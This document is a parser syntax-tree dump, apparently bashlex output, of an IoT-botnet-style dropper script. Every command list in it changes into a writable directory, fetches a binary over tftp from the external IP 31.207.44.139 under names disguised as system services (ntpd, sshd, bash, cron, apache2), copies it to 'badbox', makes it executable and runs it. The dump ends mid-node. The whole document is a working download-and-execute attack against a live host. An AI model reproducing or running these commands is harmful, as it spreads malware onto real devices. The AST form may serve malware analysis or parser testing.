CommandNode(lineno=2, pos=(12, 26), parts=[
  WordNode(lineno=2, pos=(12, 18), word='ulimit'),
  WordNode(lineno=2, pos=(19, 21), word='-n'),
  WordNode(lineno=2, pos=(22, 26), word='1024'),
])
CommandNode(lineno=3, pos=(27, 48), parts=[
  WordNode(lineno=3, pos=(27, 29), word='cp'),
  WordNode(lineno=3, pos=(30, 42), word='/bin/busybox'),
  WordNode(lineno=3, pos=(43, 48), word='/tmp/'),
])
ListNode(lineno=4, pos=(49, 171), parts=[
  CommandNode(lineno=4, pos=(49, 56), parts=[
    WordNode(lineno=4, pos=(49, 51), word='cd'),
    WordNode(lineno=4, pos=(52, 56), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(57, 59)),
  CommandNode(lineno=4, pos=(60, 71), parts=[
    WordNode(lineno=4, pos=(60, 62), word='cd'),
    WordNode(lineno=4, pos=(63, 71), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(72, 74)),
  CommandNode(lineno=4, pos=(75, 82), parts=[
    WordNode(lineno=4, pos=(75, 77), word='cd'),
    WordNode(lineno=4, pos=(78, 82), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(83, 85)),
  CommandNode(lineno=4, pos=(86, 94), parts=[
    WordNode(lineno=4, pos=(86, 88), word='cd'),
    WordNode(lineno=4, pos=(89, 94), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(95, 97)),
  CommandNode(lineno=4, pos=(98, 102), parts=[
    WordNode(lineno=4, pos=(98, 100), word='cd'),
    WordNode(lineno=4, pos=(101, 102), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(102, 103)),
  CommandNode(lineno=4, pos=(104, 134), parts=[
    WordNode(lineno=4, pos=(104, 108), word='tftp'),
    WordNode(lineno=4, pos=(109, 122), word='31.207.44.139'),
    WordNode(lineno=4, pos=(123, 125), word='-c'),
    WordNode(lineno=4, pos=(126, 129), word='get'),
    WordNode(lineno=4, pos=(130, 134), word='ntpd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(134, 135)),
  CommandNode(lineno=4, pos=(135, 151), parts=[
    WordNode(lineno=4, pos=(135, 138), word='cat'),
    WordNode(lineno=4, pos=(139, 143), word='ntpd'),
    RedirectNode(lineno=4, output=
      WordNode(lineno=4, pos=(145, 151), word='badbox'), pos=(144, 151), type='>'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(151, 152)),
  CommandNode(lineno=4, pos=(152, 162), parts=[
    WordNode(lineno=4, pos=(152, 157), word='chmod'),
    WordNode(lineno=4, pos=(158, 160), word='+x'),
    WordNode(lineno=4, pos=(161, 162), word='*'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(162, 163)),
  CommandNode(lineno=4, pos=(163, 171), parts=[
    WordNode(lineno=4, pos=(163, 171), word='./badbox'),
  ]),
])
ListNode(lineno=5, pos=(172, 294), parts=[
  CommandNode(lineno=5, pos=(172, 179), parts=[
    WordNode(lineno=5, pos=(172, 174), word='cd'),
    WordNode(lineno=5, pos=(175, 179), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(180, 182)),
  CommandNode(lineno=5, pos=(183, 194), parts=[
    WordNode(lineno=5, pos=(183, 185), word='cd'),
    WordNode(lineno=5, pos=(186, 194), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(195, 197)),
  CommandNode(lineno=5, pos=(198, 205), parts=[
    WordNode(lineno=5, pos=(198, 200), word='cd'),
    WordNode(lineno=5, pos=(201, 205), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(206, 208)),
  CommandNode(lineno=5, pos=(209, 217), parts=[
    WordNode(lineno=5, pos=(209, 211), word='cd'),
    WordNode(lineno=5, pos=(212, 217), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(218, 220)),
  CommandNode(lineno=5, pos=(221, 225), parts=[
    WordNode(lineno=5, pos=(221, 223), word='cd'),
    WordNode(lineno=5, pos=(224, 225), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(225, 226)),
  CommandNode(lineno=5, pos=(227, 257), parts=[
    WordNode(lineno=5, pos=(227, 231), word='tftp'),
    WordNode(lineno=5, pos=(232, 245), word='31.207.44.139'),
    WordNode(lineno=5, pos=(246, 248), word='-c'),
    WordNode(lineno=5, pos=(249, 252), word='get'),
    WordNode(lineno=5, pos=(253, 257), word='sshd'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(257, 258)),
  CommandNode(lineno=5, pos=(258, 274), parts=[
    WordNode(lineno=5, pos=(258, 261), word='cat'),
    WordNode(lineno=5, pos=(262, 266), word='sshd'),
    RedirectNode(lineno=5, output=
      WordNode(lineno=5, pos=(268, 274), word='badbox'), pos=(267, 274), type='>'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(274, 275)),
  CommandNode(lineno=5, pos=(275, 285), parts=[
    WordNode(lineno=5, pos=(275, 280), word='chmod'),
    WordNode(lineno=5, pos=(281, 283), word='+x'),
    WordNode(lineno=5, pos=(284, 285), word='*'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(285, 286)),
  CommandNode(lineno=5, pos=(286, 294), parts=[
    WordNode(lineno=5, pos=(286, 294), word='./badbox'),
  ]),
])
ListNode(lineno=6, pos=(295, 423), parts=[
  CommandNode(lineno=6, pos=(295, 302), parts=[
    WordNode(lineno=6, pos=(295, 297), word='cd'),
    WordNode(lineno=6, pos=(298, 302), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(303, 305)),
  CommandNode(lineno=6, pos=(306, 317), parts=[
    WordNode(lineno=6, pos=(306, 308), word='cd'),
    WordNode(lineno=6, pos=(309, 317), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(318, 320)),
  CommandNode(lineno=6, pos=(321, 328), parts=[
    WordNode(lineno=6, pos=(321, 323), word='cd'),
    WordNode(lineno=6, pos=(324, 328), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(329, 331)),
  CommandNode(lineno=6, pos=(332, 340), parts=[
    WordNode(lineno=6, pos=(332, 334), word='cd'),
    WordNode(lineno=6, pos=(335, 340), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(341, 343)),
  CommandNode(lineno=6, pos=(344, 348), parts=[
    WordNode(lineno=6, pos=(344, 346), word='cd'),
    WordNode(lineno=6, pos=(347, 348), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(348, 349)),
  CommandNode(lineno=6, pos=(350, 383), parts=[
    WordNode(lineno=6, pos=(350, 354), word='tftp'),
    WordNode(lineno=6, pos=(355, 368), word='31.207.44.139'),
    WordNode(lineno=6, pos=(369, 371), word='-c'),
    WordNode(lineno=6, pos=(372, 375), word='get'),
    WordNode(lineno=6, pos=(376, 383), word='openssh'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(383, 384)),
  CommandNode(lineno=6, pos=(384, 403), parts=[
    WordNode(lineno=6, pos=(384, 387), word='cat'),
    WordNode(lineno=6, pos=(388, 395), word='openssh'),
    RedirectNode(lineno=6, output=
      WordNode(lineno=6, pos=(397, 403), word='badbox'), pos=(396, 403), type='>'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(403, 404)),
  CommandNode(lineno=6, pos=(404, 414), parts=[
    WordNode(lineno=6, pos=(404, 409), word='chmod'),
    WordNode(lineno=6, pos=(410, 412), word='+x'),
    WordNode(lineno=6, pos=(413, 414), word='*'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(414, 415)),
  CommandNode(lineno=6, pos=(415, 423), parts=[
    WordNode(lineno=6, pos=(415, 423), word='./badbox'),
  ]),
])
ListNode(lineno=7, pos=(424, 546), parts=[
  CommandNode(lineno=7, pos=(424, 431), parts=[
    WordNode(lineno=7, pos=(424, 426), word='cd'),
    WordNode(lineno=7, pos=(427, 431), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(432, 434)),
  CommandNode(lineno=7, pos=(435, 446), parts=[
    WordNode(lineno=7, pos=(435, 437), word='cd'),
    WordNode(lineno=7, pos=(438, 446), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(447, 449)),
  CommandNode(lineno=7, pos=(450, 457), parts=[
    WordNode(lineno=7, pos=(450, 452), word='cd'),
    WordNode(lineno=7, pos=(453, 457), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(458, 460)),
  CommandNode(lineno=7, pos=(461, 469), parts=[
    WordNode(lineno=7, pos=(461, 463), word='cd'),
    WordNode(lineno=7, pos=(464, 469), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(470, 472)),
  CommandNode(lineno=7, pos=(473, 477), parts=[
    WordNode(lineno=7, pos=(473, 475), word='cd'),
    WordNode(lineno=7, pos=(476, 477), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(477, 478)),
  CommandNode(lineno=7, pos=(479, 509), parts=[
    WordNode(lineno=7, pos=(479, 483), word='tftp'),
    WordNode(lineno=7, pos=(484, 497), word='31.207.44.139'),
    WordNode(lineno=7, pos=(498, 500), word='-c'),
    WordNode(lineno=7, pos=(501, 504), word='get'),
    WordNode(lineno=7, pos=(505, 509), word='bash'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(509, 510)),
  CommandNode(lineno=7, pos=(510, 526), parts=[
    WordNode(lineno=7, pos=(510, 513), word='cat'),
    WordNode(lineno=7, pos=(514, 518), word='bash'),
    RedirectNode(lineno=7, output=
      WordNode(lineno=7, pos=(520, 526), word='badbox'), pos=(519, 526), type='>'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(526, 527)),
  CommandNode(lineno=7, pos=(527, 537), parts=[
    WordNode(lineno=7, pos=(527, 532), word='chmod'),
    WordNode(lineno=7, pos=(533, 535), word='+x'),
    WordNode(lineno=7, pos=(536, 537), word='*'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(537, 538)),
  CommandNode(lineno=7, pos=(538, 546), parts=[
    WordNode(lineno=7, pos=(538, 546), word='./badbox'),
  ]),
])
ListNode(lineno=8, pos=(547, 669), parts=[
  CommandNode(lineno=8, pos=(547, 554), parts=[
    WordNode(lineno=8, pos=(547, 549), word='cd'),
    WordNode(lineno=8, pos=(550, 554), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(555, 557)),
  CommandNode(lineno=8, pos=(558, 569), parts=[
    WordNode(lineno=8, pos=(558, 560), word='cd'),
    WordNode(lineno=8, pos=(561, 569), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(570, 572)),
  CommandNode(lineno=8, pos=(573, 580), parts=[
    WordNode(lineno=8, pos=(573, 575), word='cd'),
    WordNode(lineno=8, pos=(576, 580), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(581, 583)),
  CommandNode(lineno=8, pos=(584, 592), parts=[
    WordNode(lineno=8, pos=(584, 586), word='cd'),
    WordNode(lineno=8, pos=(587, 592), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(593, 595)),
  CommandNode(lineno=8, pos=(596, 600), parts=[
    WordNode(lineno=8, pos=(596, 598), word='cd'),
    WordNode(lineno=8, pos=(599, 600), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(600, 601)),
  CommandNode(lineno=8, pos=(602, 632), parts=[
    WordNode(lineno=8, pos=(602, 606), word='tftp'),
    WordNode(lineno=8, pos=(607, 620), word='31.207.44.139'),
    WordNode(lineno=8, pos=(621, 623), word='-c'),
    WordNode(lineno=8, pos=(624, 627), word='get'),
    WordNode(lineno=8, pos=(628, 632), word='tftp'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(632, 633)),
  CommandNode(lineno=8, pos=(633, 649), parts=[
    WordNode(lineno=8, pos=(633, 636), word='cat'),
    WordNode(lineno=8, pos=(637, 641), word='tftp'),
    RedirectNode(lineno=8, output=
      WordNode(lineno=8, pos=(643, 649), word='badbox'), pos=(642, 649), type='>'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(649, 650)),
  CommandNode(lineno=8, pos=(650, 660), parts=[
    WordNode(lineno=8, pos=(650, 655), word='chmod'),
    WordNode(lineno=8, pos=(656, 658), word='+x'),
    WordNode(lineno=8, pos=(659, 660), word='*'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(660, 661)),
  CommandNode(lineno=8, pos=(661, 669), parts=[
    WordNode(lineno=8, pos=(661, 669), word='./badbox'),
  ]),
])
ListNode(lineno=9, pos=(670, 792), parts=[
  CommandNode(lineno=9, pos=(670, 677), parts=[
    WordNode(lineno=9, pos=(670, 672), word='cd'),
    WordNode(lineno=9, pos=(673, 677), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(678, 680)),
  CommandNode(lineno=9, pos=(681, 692), parts=[
    WordNode(lineno=9, pos=(681, 683), word='cd'),
    WordNode(lineno=9, pos=(684, 692), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(693, 695)),
  CommandNode(lineno=9, pos=(696, 703), parts=[
    WordNode(lineno=9, pos=(696, 698), word='cd'),
    WordNode(lineno=9, pos=(699, 703), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(704, 706)),
  CommandNode(lineno=9, pos=(707, 715), parts=[
    WordNode(lineno=9, pos=(707, 709), word='cd'),
    WordNode(lineno=9, pos=(710, 715), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(716, 718)),
  CommandNode(lineno=9, pos=(719, 723), parts=[
    WordNode(lineno=9, pos=(719, 721), word='cd'),
    WordNode(lineno=9, pos=(722, 723), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(723, 724)),
  CommandNode(lineno=9, pos=(725, 755), parts=[
    WordNode(lineno=9, pos=(725, 729), word='tftp'),
    WordNode(lineno=9, pos=(730, 743), word='31.207.44.139'),
    WordNode(lineno=9, pos=(744, 746), word='-c'),
    WordNode(lineno=9, pos=(747, 750), word='get'),
    WordNode(lineno=9, pos=(751, 755), word='wget'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(755, 756)),
  CommandNode(lineno=9, pos=(756, 772), parts=[
    WordNode(lineno=9, pos=(756, 759), word='cat'),
    WordNode(lineno=9, pos=(760, 764), word='wget'),
    RedirectNode(lineno=9, output=
      WordNode(lineno=9, pos=(766, 772), word='badbox'), pos=(765, 772), type='>'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(772, 773)),
  CommandNode(lineno=9, pos=(773, 783), parts=[
    WordNode(lineno=9, pos=(773, 778), word='chmod'),
    WordNode(lineno=9, pos=(779, 781), word='+x'),
    WordNode(lineno=9, pos=(782, 783), word='*'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(783, 784)),
  CommandNode(lineno=9, pos=(784, 792), parts=[
    WordNode(lineno=9, pos=(784, 792), word='./badbox'),
  ]),
])
ListNode(lineno=10, pos=(793, 915), parts=[
  CommandNode(lineno=10, pos=(793, 800), parts=[
    WordNode(lineno=10, pos=(793, 795), word='cd'),
    WordNode(lineno=10, pos=(796, 800), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(801, 803)),
  CommandNode(lineno=10, pos=(804, 815), parts=[
    WordNode(lineno=10, pos=(804, 806), word='cd'),
    WordNode(lineno=10, pos=(807, 815), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(816, 818)),
  CommandNode(lineno=10, pos=(819, 826), parts=[
    WordNode(lineno=10, pos=(819, 821), word='cd'),
    WordNode(lineno=10, pos=(822, 826), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(827, 829)),
  CommandNode(lineno=10, pos=(830, 838), parts=[
    WordNode(lineno=10, pos=(830, 832), word='cd'),
    WordNode(lineno=10, pos=(833, 838), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(839, 841)),
  CommandNode(lineno=10, pos=(842, 846), parts=[
    WordNode(lineno=10, pos=(842, 844), word='cd'),
    WordNode(lineno=10, pos=(845, 846), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(846, 847)),
  CommandNode(lineno=10, pos=(848, 878), parts=[
    WordNode(lineno=10, pos=(848, 852), word='tftp'),
    WordNode(lineno=10, pos=(853, 866), word='31.207.44.139'),
    WordNode(lineno=10, pos=(867, 869), word='-c'),
    WordNode(lineno=10, pos=(870, 873), word='get'),
    WordNode(lineno=10, pos=(874, 878), word='cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(878, 879)),
  CommandNode(lineno=10, pos=(879, 895), parts=[
    WordNode(lineno=10, pos=(879, 882), word='cat'),
    WordNode(lineno=10, pos=(883, 887), word='cron'),
    RedirectNode(lineno=10, output=
      WordNode(lineno=10, pos=(889, 895), word='badbox'), pos=(888, 895), type='>'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(895, 896)),
  CommandNode(lineno=10, pos=(896, 906), parts=[
    WordNode(lineno=10, pos=(896, 901), word='chmod'),
    WordNode(lineno=10, pos=(902, 904), word='+x'),
    WordNode(lineno=10, pos=(905, 906), word='*'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(906, 907)),
  CommandNode(lineno=10, pos=(907, 915), parts=[
    WordNode(lineno=10, pos=(907, 915), word='./badbox'),
  ]),
])
ListNode(lineno=11, pos=(916, 1036), parts=[
  CommandNode(lineno=11, pos=(916, 923), parts=[
    WordNode(lineno=11, pos=(916, 918), word='cd'),
    WordNode(lineno=11, pos=(919, 923), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(924, 926)),
  CommandNode(lineno=11, pos=(927, 938), parts=[
    WordNode(lineno=11, pos=(927, 929), word='cd'),
    WordNode(lineno=11, pos=(930, 938), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(939, 941)),
  CommandNode(lineno=11, pos=(942, 949), parts=[
    WordNode(lineno=11, pos=(942, 944), word='cd'),
    WordNode(lineno=11, pos=(945, 949), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(950, 952)),
  CommandNode(lineno=11, pos=(953, 961), parts=[
    WordNode(lineno=11, pos=(953, 955), word='cd'),
    WordNode(lineno=11, pos=(956, 961), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(962, 964)),
  CommandNode(lineno=11, pos=(965, 969), parts=[
    WordNode(lineno=11, pos=(965, 967), word='cd'),
    WordNode(lineno=11, pos=(968, 969), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(969, 970)),
  CommandNode(lineno=11, pos=(971, 1000), parts=[
    WordNode(lineno=11, pos=(971, 975), word='tftp'),
    WordNode(lineno=11, pos=(976, 989), word='31.207.44.139'),
    WordNode(lineno=11, pos=(990, 992), word='-c'),
    WordNode(lineno=11, pos=(993, 996), word='get'),
    WordNode(lineno=11, pos=(997, 1000), word='ftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1000, 1001)),
  CommandNode(lineno=11, pos=(1001, 1016), parts=[
    WordNode(lineno=11, pos=(1001, 1004), word='cat'),
    WordNode(lineno=11, pos=(1005, 1008), word='ftp'),
    RedirectNode(lineno=11, output=
      WordNode(lineno=11, pos=(1010, 1016), word='badbox'), pos=(1009, 1016), type='>'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1016, 1017)),
  CommandNode(lineno=11, pos=(1017, 1027), parts=[
    WordNode(lineno=11, pos=(1017, 1022), word='chmod'),
    WordNode(lineno=11, pos=(1023, 1025), word='+x'),
    WordNode(lineno=11, pos=(1026, 1027), word='*'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1027, 1028)),
  CommandNode(lineno=11, pos=(1028, 1036), parts=[
    WordNode(lineno=11, pos=(1028, 1036), word='./badbox'),
  ]),
])
ListNode(lineno=12, pos=(1037, 1159), parts=[
  CommandNode(lineno=12, pos=(1037, 1044), parts=[
    WordNode(lineno=12, pos=(1037, 1039), word='cd'),
    WordNode(lineno=12, pos=(1040, 1044), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1045, 1047)),
  CommandNode(lineno=12, pos=(1048, 1059), parts=[
    WordNode(lineno=12, pos=(1048, 1050), word='cd'),
    WordNode(lineno=12, pos=(1051, 1059), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1060, 1062)),
  CommandNode(lineno=12, pos=(1063, 1070), parts=[
    WordNode(lineno=12, pos=(1063, 1065), word='cd'),
    WordNode(lineno=12, pos=(1066, 1070), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1071, 1073)),
  CommandNode(lineno=12, pos=(1074, 1082), parts=[
    WordNode(lineno=12, pos=(1074, 1076), word='cd'),
    WordNode(lineno=12, pos=(1077, 1082), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1083, 1085)),
  CommandNode(lineno=12, pos=(1086, 1090), parts=[
    WordNode(lineno=12, pos=(1086, 1088), word='cd'),
    WordNode(lineno=12, pos=(1089, 1090), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1090, 1091)),
  CommandNode(lineno=12, pos=(1092, 1122), parts=[
    WordNode(lineno=12, pos=(1092, 1096), word='tftp'),
    WordNode(lineno=12, pos=(1097, 1110), word='31.207.44.139'),
    WordNode(lineno=12, pos=(1111, 1113), word='-c'),
    WordNode(lineno=12, pos=(1114, 1117), word='get'),
    WordNode(lineno=12, pos=(1118, 1122), word='pftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1122, 1123)),
  CommandNode(lineno=12, pos=(1123, 1139), parts=[
    WordNode(lineno=12, pos=(1123, 1126), word='cat'),
    WordNode(lineno=12, pos=(1127, 1131), word='pftp'),
    RedirectNode(lineno=12, output=
      WordNode(lineno=12, pos=(1133, 1139), word='badbox'), pos=(1132, 1139), type='>'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1139, 1140)),
  CommandNode(lineno=12, pos=(1140, 1150), parts=[
    WordNode(lineno=12, pos=(1140, 1145), word='chmod'),
    WordNode(lineno=12, pos=(1146, 1148), word='+x'),
    WordNode(lineno=12, pos=(1149, 1150), word='*'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1150, 1151)),
  CommandNode(lineno=12, pos=(1151, 1159), parts=[
    WordNode(lineno=12, pos=(1151, 1159), word='./badbox'),
  ]),
])
ListNode(lineno=13, pos=(1160, 1278), parts=[
  CommandNode(lineno=13, pos=(1160, 1167), parts=[
    WordNode(lineno=13, pos=(1160, 1162), word='cd'),
    WordNode(lineno=13, pos=(1163, 1167), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1168, 1170)),
  CommandNode(lineno=13, pos=(1171, 1182), parts=[
    WordNode(lineno=13, pos=(1171, 1173), word='cd'),
    WordNode(lineno=13, pos=(1174, 1182), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1183, 1185)),
  CommandNode(lineno=13, pos=(1186, 1193), parts=[
    WordNode(lineno=13, pos=(1186, 1188), word='cd'),
    WordNode(lineno=13, pos=(1189, 1193), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1194, 1196)),
  CommandNode(lineno=13, pos=(1197, 1205), parts=[
    WordNode(lineno=13, pos=(1197, 1199), word='cd'),
    WordNode(lineno=13, pos=(1200, 1205), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1206, 1208)),
  CommandNode(lineno=13, pos=(1209, 1213), parts=[
    WordNode(lineno=13, pos=(1209, 1211), word='cd'),
    WordNode(lineno=13, pos=(1212, 1213), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1213, 1214)),
  CommandNode(lineno=13, pos=(1215, 1243), parts=[
    WordNode(lineno=13, pos=(1215, 1219), word='tftp'),
    WordNode(lineno=13, pos=(1220, 1233), word='31.207.44.139'),
    WordNode(lineno=13, pos=(1234, 1236), word='-c'),
    WordNode(lineno=13, pos=(1237, 1240), word='get'),
    WordNode(lineno=13, pos=(1241, 1243), word='sh'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1243, 1244)),
  CommandNode(lineno=13, pos=(1244, 1258), parts=[
    WordNode(lineno=13, pos=(1244, 1247), word='cat'),
    WordNode(lineno=13, pos=(1248, 1250), word='sh'),
    RedirectNode(lineno=13, output=
      WordNode(lineno=13, pos=(1252, 1258), word='badbox'), pos=(1251, 1258), type='>'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1258, 1259)),
  CommandNode(lineno=13, pos=(1259, 1269), parts=[
    WordNode(lineno=13, pos=(1259, 1264), word='chmod'),
    WordNode(lineno=13, pos=(1265, 1267), word='+x'),
    WordNode(lineno=13, pos=(1268, 1269), word='*'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1269, 1270)),
  CommandNode(lineno=13, pos=(1270, 1278), parts=[
    WordNode(lineno=13, pos=(1270, 1278), word='./badbox'),
  ]),
])
ListNode(lineno=14, pos=(1279, 1399), parts=[
  CommandNode(lineno=14, pos=(1279, 1286), parts=[
    WordNode(lineno=14, pos=(1279, 1281), word='cd'),
    WordNode(lineno=14, pos=(1282, 1286), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1287, 1289)),
  CommandNode(lineno=14, pos=(1290, 1301), parts=[
    WordNode(lineno=14, pos=(1290, 1292), word='cd'),
    WordNode(lineno=14, pos=(1293, 1301), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1302, 1304)),
  CommandNode(lineno=14, pos=(1305, 1312), parts=[
    WordNode(lineno=14, pos=(1305, 1307), word='cd'),
    WordNode(lineno=14, pos=(1308, 1312), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1313, 1315)),
  CommandNode(lineno=14, pos=(1316, 1324), parts=[
    WordNode(lineno=14, pos=(1316, 1318), word='cd'),
    WordNode(lineno=14, pos=(1319, 1324), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1325, 1327)),
  CommandNode(lineno=14, pos=(1328, 1332), parts=[
    WordNode(lineno=14, pos=(1328, 1330), word='cd'),
    WordNode(lineno=14, pos=(1331, 1332), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1332, 1333)),
  CommandNode(lineno=14, pos=(1334, 1363), parts=[
    WordNode(lineno=14, pos=(1334, 1338), word='tftp'),
    WordNode(lineno=14, pos=(1339, 1352), word='31.207.44.139'),
    WordNode(lineno=14, pos=(1353, 1355), word='-c'),
    WordNode(lineno=14, pos=(1356, 1359), word='get'),
    WordNode(lineno=14, pos=(1360, 1363), word=' '),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1363, 1364)),
  CommandNode(lineno=14, pos=(1364, 1379), parts=[
    WordNode(lineno=14, pos=(1364, 1367), word='cat'),
    WordNode(lineno=14, pos=(1368, 1371), word=' '),
    RedirectNode(lineno=14, output=
      WordNode(lineno=14, pos=(1373, 1379), word='badbox'), pos=(1372, 1379), type='>'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1379, 1380)),
  CommandNode(lineno=14, pos=(1380, 1390), parts=[
    WordNode(lineno=14, pos=(1380, 1385), word='chmod'),
    WordNode(lineno=14, pos=(1386, 1388), word='+x'),
    WordNode(lineno=14, pos=(1389, 1390), word='*'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1390, 1391)),
  CommandNode(lineno=14, pos=(1391, 1399), parts=[
    WordNode(lineno=14, pos=(1391, 1399), word='./badbox'),
  ]),
])
ListNode(lineno=15, pos=(1400, 1528), parts=[
  CommandNode(lineno=15, pos=(1400, 1407), parts=[
    WordNode(lineno=15, pos=(1400, 1402), word='cd'),
    WordNode(lineno=15, pos=(1403, 1407), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1408, 1410)),
  CommandNode(lineno=15, pos=(1411, 1422), parts=[
    WordNode(lineno=15, pos=(1411, 1413), word='cd'),
    WordNode(lineno=15, pos=(1414, 1422), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1423, 1425)),
  CommandNode(lineno=15, pos=(1426, 1433), parts=[
    WordNode(lineno=15, pos=(1426, 1428), word='cd'),
    WordNode(lineno=15, pos=(1429, 1433), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1434, 1436)),
  CommandNode(lineno=15, pos=(1437, 1445), parts=[
    WordNode(lineno=15, pos=(1437, 1439), word='cd'),
    WordNode(lineno=15, pos=(1440, 1445), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1446, 1448)),
  CommandNode(lineno=15, pos=(1449, 1453), parts=[
    WordNode(lineno=15, pos=(1449, 1451), word='cd'),
    WordNode(lineno=15, pos=(1452, 1453), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1453, 1454)),
  CommandNode(lineno=15, pos=(1455, 1488), parts=[
    WordNode(lineno=15, pos=(1455, 1459), word='tftp'),
    WordNode(lineno=15, pos=(1460, 1473), word='31.207.44.139'),
    WordNode(lineno=15, pos=(1474, 1476), word='-c'),
    WordNode(lineno=15, pos=(1477, 1480), word='get'),
    WordNode(lineno=15, pos=(1481, 1488), word='apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1488, 1489)),
  CommandNode(lineno=15, pos=(1489, 1508), parts=[
    WordNode(lineno=15, pos=(1489, 1492), word='cat'),
    WordNode(lineno=15, pos=(1493, 1500), word='apache2'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1502, 1508), word='badbox'), pos=(1501, 1508), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1508, 1509)),
  CommandNode(lineno=15, pos=(1509, 1519), parts=[
    WordNode(lineno=15, pos=(1509, 1514), word='chmod'),
    WordNode(lineno=15, pos=(1515, 1517), word='+x'),
    WordNode(lineno=15, pos=(1518, 1519), word='*'),
  ]),
